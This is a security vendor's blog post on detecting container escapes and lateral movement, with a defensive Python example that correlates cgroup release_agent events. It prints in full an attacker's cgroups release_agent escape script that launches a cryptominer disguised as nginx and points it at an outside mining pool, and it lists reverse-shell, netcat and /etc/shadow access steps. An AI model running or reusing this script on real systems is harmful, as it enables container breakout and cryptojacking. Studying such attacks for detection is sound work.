Confluera Engineering

Confluera engineering is not perfect, but we pursue perfection. We write our journey here.

Threat Detections for Container Lateral Movements and Container Escapes — This is How

A container wide open. source: technadu.com

Introduction

The simplicity and flexibility of microservice architecture have led to increasing adoption of containers and Kubernetes in the cloud. According to Gartner, more than 75% of global organizations will be running containerized apps in production by 2022.

As adoption increases, threat actors are evolving their toolsets to compromise container workloads. It was recently reported that 50,000 IPs across multiple Kubernetes clusters were compromised by TeamTNT.

Threat actors typically exploit vulnerabilities and/or misconfigurations of the container workloads. They can move not only between containers, but also between containers and the underlying hosts. Recently, we observed that threat actors such as TeamTNT have developed more sophisticated techniques to perform container escapes.

TeamTNT’s Container Escape

In the TeamTNT operation we observed, once it gains a foothold on a privileged container, it uses a container escape technique similar to the initial PoC tweeted by Felix Wilhelm from Google. It abuses the cgroups release_agent feature as shown below:

#!/bin/sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo "#!/bin/sh" > /cmd
echo "while true; do pkill -9 xmrig; sleep 3; done" >> /cmd
chmod a+x /cmd
sh -c 'echo 0 >/tmp/cgrp/x/cgroup.procs'
/nginx --donate-level 0 -o 46.101.19.93:3333 -u <hidden> -p <hidden> --nichehash

By using the above script, an attacker is able to break out of the container and execute the cmd script as root if the container is run as a privileged container. The nginx binary is actually a cryptocurrency miner. The attacker may have used the name nginx to trick the victim into thinking that it is a legitimate web server and to evade detection.

Container Lateral Movements and Container Escapes

Container lateral movements can be classified into three categories:

  1. Container to host (including container escapes)
  2. Host to container
  3. Container to container

Container escape can be further classified into three categories:

  1. Escape via configuration abuse
  2. Escape via kernel vulnerabilities
  3. Escape via container engine vulnerabilities

Detecting these activities is critical for detection and response. For example, in the case of container escape, an attacker who escapes the container will likely have access to host resources and other containers on the host.

The Confluera Approach

While traditional point-based detections show users a sea of independent alerts, Confluera XDR presents real-time threat progressions (a.k.a. incident timeline or attack narrative) to users and significantly improves efficacy. This allows DevSecOps/SOC analysts to quickly identify risk and prioritize risk mitigations by reviewing the logical threat progression instead of investigating the sea of independent alerts.

Threat Progression for A Container Escape

In this post, we will demonstrate an example of Confluera XDR’s threat progression for containers.

Let’s look at an example breach involving container escape with cgroups release_agent. This belongs to the “Escape via configuration abuse” category we mentioned above. We will visualize this incident through the lens of the MITRE ATT&CK framework, the de facto industry standard for the definition and classification of infrastructure-wide cyberattacks.

Our victim environment has a host machine (joe-el8) running a privileged container (the container ID ends with 7a1f40).

The attacker performed the following actions:

  1. Exploited a nodejs web application vulnerability on the container and used server processes to create shell processes with command (“Execution” technique)
  2. Spawned a reverse shell to the C2 server (“Execution” technique)
  3. Wrote a payload to the release_agent configuration files (“Persistence” technique)
  4. Let the host execute the malicious payload using the release_agent feature (“Lateral Movement” technique)
  5. Let the host execute the abnormal file generated by the container from the host file system as root (“Privilege Escalation” technique)
  6. Ran the suspicious network tool netcat in the container (“Execution” technique)
  7. Spawned a root reverse shell from the host to the container (“Execution” technique)
  8. Accessed the host /etc/shadow file in an abnormal way (“Credential Access” technique)

Confluera detects and captures the sequence of activities into a single threat progression as shown in the screenshot below. Keep in mind that there can be any number of alerts triggered on this host and/or this container by other activities. However, this threat progression will not show those alerts and therefore significantly improves efficacy.

Confluera XDR surfaces threat progression across your entire infrastructure instead of independent alerts
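
The grouping idea described above, applied to the release_agent steps of this incident, as an added example that is not Confluera's implementation or code from the original post: related events are chained per container, and a host-side execution of the path registered as release_agent links the host activity back to the originating container. The event tuple format, the container names and the payload path are constructed assumptions.

```python
# Constructed sample telemetry (not from the page): one tuple per event,
# (container_id or None for the host, action, target path, data written / fs type).
PAYLOAD = "/var/lib/docker/overlay2/EXAMPLE/diff/cmd"  # hypothetical upperdir path
EVENTS = [
    ("ctr-a", "mount", "/tmp/cgrp", "cgroup"),
    ("ctr-a", "write", "/tmp/cgrp/x/notify_on_release", "1"),
    ("ctr-b", "write", "/var/log/app.log", "started"),        # benign noise
    ("ctr-a", "write", "/tmp/cgrp/release_agent", PAYLOAD),
    ("ctr-a", "write", "/tmp/cgrp/x/cgroup.procs", "0"),
    (None, "exec", PAYLOAD, ""),                              # host runs the agent
]

def classify(ctr, action, target, data):
    """Map one in-container event to a stage of the release_agent abuse, or None."""
    if ctr is None:
        return None
    if action == "mount" and data == "cgroup":
        return "cgroup_mount"
    if action == "write" and target.endswith("/notify_on_release") and data.strip() == "1":
        return "notify_on_release"
    if action == "write" and target.endswith("/release_agent"):
        return "release_agent_write"
    return None

def progressions(events):
    """Group related events per container; unrelated events never appear."""
    stages, agent_owner = {}, {}
    for ctr, action, target, data in events:
        stage = classify(ctr, action, target, data)
        if stage:
            stages.setdefault(ctr, []).append(stage)
            if stage == "release_agent_write":
                agent_owner[data.strip()] = ctr   # remember who registered this path
        elif ctr is None and action == "exec" and target in agent_owner:
            stages[agent_owner[target]].append("host_exec")
    report = {}
    for ctr, seen in stages.items():
        if "host_exec" in seen:
            report[ctr] = ("escape", seen)
        elif "release_agent_write" in seen:
            report[ctr] = ("attempt", seen)
    return report

if __name__ == "__main__":
    for ctr, (verdict, seen) in progressions(EVENTS).items():
        print(ctr, verdict, " -> ".join(seen))
```

A container that writes release_agent without a matching host execution is reported as an attempt, which gives responders a chance to act before the payload runs on the host.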

Conclusion

Malicious actors are becoming more sophisticated and constantly inventing new ways to attack the cloud infrastructure.

This blog post demonstrates an example of Confluera XDR’s precise execution tracking of an attacker’s pre- and post-exploitation behaviors in a container environment.

Moreover, Confluera XDR detects threat progressions across endpoint, network and cloud. It also prevents successful cyber attacks by coordinating with endpoint, network, and cloud controls.

Contact us if you would like to know more.

Published in Confluera Engineering


Written by Rex Guo

Product Builder | Blackhat/Defcon speaker | @Xiaofei_REX
